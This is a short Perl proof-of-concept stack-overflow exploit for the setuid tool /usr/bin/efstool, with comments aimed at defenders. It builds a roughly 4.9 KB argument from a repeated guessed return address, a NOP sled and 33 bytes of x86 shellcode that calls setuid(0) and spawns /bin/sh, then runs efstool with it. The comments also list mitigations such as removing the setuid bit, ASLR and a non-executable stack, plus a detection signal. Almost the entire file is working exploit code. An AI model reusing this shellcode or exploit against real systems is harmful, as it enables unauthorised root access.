#!/usr/bin/perl
# Another efstool exploit
#
# Proof-of-concept that builds one oversized command-line argument and execs
# /usr/bin/efstool with it. The argument layout (a repeated 4-byte address,
# then a run of 0x90 bytes, then machine code) is the classic shape of a
# stack-smashing PoC. The flaw itself lives in efstool's argument handling
# and is not shown in this file.
#
# Defender notes:
#   - NOTE(review): the payload calls setuid(0) first, which only matters if
#     efstool is installed setuid root. Confirm on the host; if it is,
#     dropping the setuid bit or removing the binary is the direct mitigation.
#   - The hard-coded 0xbfff.... address presumes a 32-bit Linux process with
#     a predictable, executable stack. ASLR and a non-executable stack break
#     both assumptions.
#   - An execve of efstool with a multi-kilobyte argument containing long
#     runs of 0x90 is a usable detection signal in exec auditing.

# 33 bytes of x86 (int 0x80 ABI) machine code: setuid(0), then
# execve("//bin/sh"). The two pushed dwords spell "//bi" and "n/sh".
$shell = "\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89".
"\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89".
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

# Address written over the saved return address; presumably a guess at where
# the argument lands on the target's stack.
$ret =0xbfffe590;
$buf = 3000;   # bytes of repeated address placed at the front of the argument
$egg = 2000;   # size budget for the NOP run plus the machine code
$nop = "\x90"; # x86 single-byte no-op
$offset = 0;

# Optional first argument: a numeric adjustment added to $ret.
if (@ARGV == 1) { $offset = $ARGV[0]; }

# pack('l') emits the sum as a 4-byte native-endian integer.
$addr = pack('l', ($ret + $offset));

# 750 iterations x 4 bytes = 3000 bytes of the same address.
for ($i = 0; $i < $buf; $i += 4) { $buffer .= $addr; }

# 2000 - 33 - 100 = 1867 NOP bytes, followed by the machine code.
for ($i = 0; $i < ($egg - length($shell) - 100); $i++) { $buffer .= $nop; }
$buffer .= $shell;

# exec replaces the Perl process, so process logs show efstool itself being
# started with the ~4.9 KB argument.
exec("/usr/bin/efstool $buffer");